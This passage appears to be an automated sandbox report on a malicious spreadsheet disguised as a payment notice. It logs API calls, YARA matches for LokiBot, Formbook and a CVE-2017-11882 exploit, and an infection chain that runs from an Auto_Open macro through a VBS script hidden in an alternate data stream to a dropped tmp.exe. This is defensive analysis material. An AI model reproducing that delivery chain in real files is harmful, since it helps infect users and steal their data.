    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA470 NtSetInformationFile,7_2_1F1CA470
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CB470 NtOpenThread,7_2_1F1CB470
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA460 NtOpenProcess,7_2_1F1CA460
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA4A0 NtUnmapViewOfSection,7_2_1F1CA4A0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CACE0 NtCreateMutant,7_2_1F1CACE0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA310 NtEnumerateValueKey,7_2_1F1CA310
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA350 NtQueryValueKey,7_2_1F1CA350
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA370 NtQueryInformationProcess,7_2_1F1CA370
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA3D0 NtCreateKey,7_2_1F1CA3D0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CBA30 NtSetContextThread,7_2_1F1CBA30
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA220 NtWaitForSingleObject,7_2_1F1CA220
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA240 NtReadFile,7_2_1F1CA240
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA260 NtWriteFile,7_2_1F1CA260
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA2F0 NtQueryInformationFile,7_2_1F1CA2F0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA800 NtSetValueKey,7_2_1F1CA800
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CB0B0 NtGetContextThread,7_2_1F1CB0B0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00562AC4 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_00562AC4
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568AB8 NtSetInformationThread,7_2_00568AB8
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00563DC6 NtProtectVirtualMemory,7_2_00563DC6
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005685E3 NtProtectVirtualMemory,7_2_005685E3
    Source: C:\ProgramData\tmp.exeCode function: 7_2_0056076E EnumWindows,NtSetInformationThread,NtProtectVirtualMemory,7_2_0056076E
    Source: C:\ProgramData\tmp.exeCode function: 7_2_0056084D NtSetInformationThread,7_2_0056084D
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005690CB NtSetInformationThread,7_2_005690CB
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005608A5 NtSetInformationThread,7_2_005608A5
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005629EF NtProtectVirtualMemory,7_2_005629EF
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005691EF NtSetInformationThread,7_2_005691EF
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00562A2A NtProtectVirtualMemory,7_2_00562A2A
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568AC1 NtSetInformationThread,7_2_00568AC1
    Source: C:\ProgramData\tmp.exeCode function: 7_2_005692A1 NtSetInformationThread,7_2_005692A1
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568B5D NtSetInformationThread,7_2_00568B5D
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00562B3B NtProtectVirtualMemory,7_2_00562B3B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568BFE NtSetInformationThread,7_2_00568BFE
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00560C51 NtProtectVirtualMemory,7_2_00560C51
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568D44 NtSetInformationThread,7_2_00568D44
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00563D19 NtProtectVirtualMemory,7_2_00563D19
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00563D2A NtProtectVirtualMemory,7_2_00563D2A
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568DE6 NtSetInformationThread,7_2_00568DE6
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00563E1E NtProtectVirtualMemory,7_2_00563E1E
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568E80 NtSetInformationThread,7_2_00568E80
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568F1B NtSetInformationThread,7_2_00568F1B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_00568FB9 NtSetInformationThread,7_2_00568FB9
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2517467_2_1F251746
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1A57907_2_1F1A5790
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2427827_2_1F242782
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1867D07_2_1F1867D0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F251FCE7_2_1F251FCE
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B66117_2_1F1B6611
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F24CE667_2_1F24CE66
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1A76407_2_1F1A7640
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B5E707_2_1F1B5E70
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B4E617_2_1F1B4E61
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F243E967_2_1F243E96
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2526F87_2_1F2526F8
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F22C53F7_2_1F22C53F
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1A15307_2_1F1A1530
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2525197_2_1F252519
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F241D1B7_2_1F241D1B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F180D407_2_1F180D40
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F24E5817_2_1F24E581
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F22E58A7_2_1F22E58A
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F231DE37_2_1F231DE3
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F24D5D27_2_1F24D5D2
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F23FDDB7_2_1F23FDDB
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F23F42B7_2_1F23F42B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1A14107_2_1F1A1410
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F19740C7_2_1F19740C
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B547E7_2_1F1B547E
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2434907_2_1F243490
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F251C9F7_2_1F251C9F
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F252C9A7_2_1F252C9A
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2444EF7_2_1F2444EF
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F24DCC57_2_1F24DCC5
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1AFB407_2_1F1AFB40
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B4B967_2_1F1B4B96
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B63C27_2_1F1B63C2
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F18EBE07_2_1F18EBE0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F240A027_2_1F240A02
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B523D7_2_1F1B523D
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F25E2147_2_1F25E214
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B4A5B7_2_1F1B4A5B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1A42B07_2_1F1A42B0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F251A997_2_1F251A99
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2522DD7_2_1F2522DD
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B71107_2_1F1B7110
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1D99067_2_1F1D9906
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B594B7_2_1F1B594B
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F25D9BE7_2_1F25D9BE
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B61807_2_1F1B6180
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2519E27_2_1F2519E2
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2461DF7_2_1F2461DF
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B98107_2_1F1B9810
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F24D0167_2_1F24D016
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B00217_2_1F1B0021
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1BE0207_2_1F1BE020
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B10707_2_1F1B1070
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2318B67_2_1F2318B6
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F19A0807_2_1F19A080
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F2528E87_2_1F2528E8
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1B48CB7_2_1F1B48CB
    Source: C:\ProgramData\tmp.exeCode function: 7_2_0056076E7_2_0056076E
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: Sub Auto_Open()
    Source: C:\ProgramData\tmp.exeCode function: String function: 1F18B0E0 appears 176 times
    Source: C:\ProgramData\tmp.exeCode function: String function: 1F1DDDE8 appears 48 times
    Source: C:\ProgramData\tmp.exeCode function: String function: 1F215110 appears 38 times
    Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winCSV@10/12@0/1
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{DEC44A8B-235A-499E-84E6-942C660EF40C} - OProcSessId.datJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
    Source: C:\ProgramData\tmp.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' 'C:\Users\user\Desktop\Payment_Notification.pdf.csv'
    Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
    Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: unknownProcess created: C:\ProgramData\tmp.exe C:\programData\tmp.exe
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbsJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\ProgramData\tmp.exe C:\programData\tmp.exeJump to behavior
    Source: C:\ProgramData\tmp.exeProcess created: C:\ProgramData\tmp.exe C:\programData\tmp.exeJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
    Source: Payment_Notification.pdf.csvStatic file information: File size 2782235 > 1048576
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.1204250327.0000000007010000.00000002.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: tmp.exe, 00000007.00000002.1246844926.000000001F27F000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: tmp.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.1204250327.0000000007010000.00000002.00000001.sdmp

    Data Obfuscation: